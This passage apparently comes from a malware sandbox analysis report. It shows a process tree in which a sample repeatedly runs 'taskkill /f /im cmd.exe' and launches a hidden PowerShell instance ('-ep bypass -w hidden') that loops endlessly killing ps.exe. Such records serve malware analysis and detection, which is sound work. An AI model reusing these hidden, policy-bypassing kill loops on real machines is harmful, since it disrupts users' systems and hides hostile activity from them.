        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4316
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4388
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4956
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3524
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3032
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4436
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3588
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4684
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4860
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4696
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1296
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2904
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2496
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4812
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1108
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3156
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2308
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4784
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2988
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4436
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3524
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2988
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4592
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:5112
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3292
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3396
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4316
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1664
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4504
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4524
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2828
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2052
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4776
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "while($true){ taskkill /f /im ps.exe}"
      4⤵
      PID:5096
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:5032
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3944
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4320
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2268
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2756
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4768
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1924
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        Kills process with taskkill
        
        PID:4744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1728
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2824
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2276
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4860
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1164
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4528
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4928
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4756
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3156
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1108
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2268
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2308
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3416
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2652
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4776
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:5000
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4364
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2160
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1536
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2988
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4412
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3700
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4308
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4316
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:5044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2004
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1856
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:5044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:644
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2308
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4116
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3004
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1148
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2076
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:5112
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4316
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1300
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4528
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4000
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1144
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2916
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3416
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2560
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3156
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1108
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4412
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1508
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2056
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4712
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1108
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1192
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3156
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:5112
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3396
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4860
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3944
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2056
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:544
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4040
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:5044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:644
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3700
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2668
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2656
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1164
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1728
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2920
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1164
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4952
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2276
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:396
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        Kills process with taskkill
        
        PID:1844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4028
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3172
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3416
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4116
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3996
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:796
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4524
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        Kills process with taskkill
        
        PID:2656
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4968
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3588
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2336
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4200
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1664
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2056
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1780
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1516
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3172
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4996
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1856
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2828
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4968
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4012
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3128
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2004
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3580
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4528
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3396
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4860
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:404
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3376
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4180
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1508
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:2572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4696
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3872
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1856
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:1332
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4696
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:796
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4524
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:4820
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im ps.exe
        5⤵
        
        PID:3376
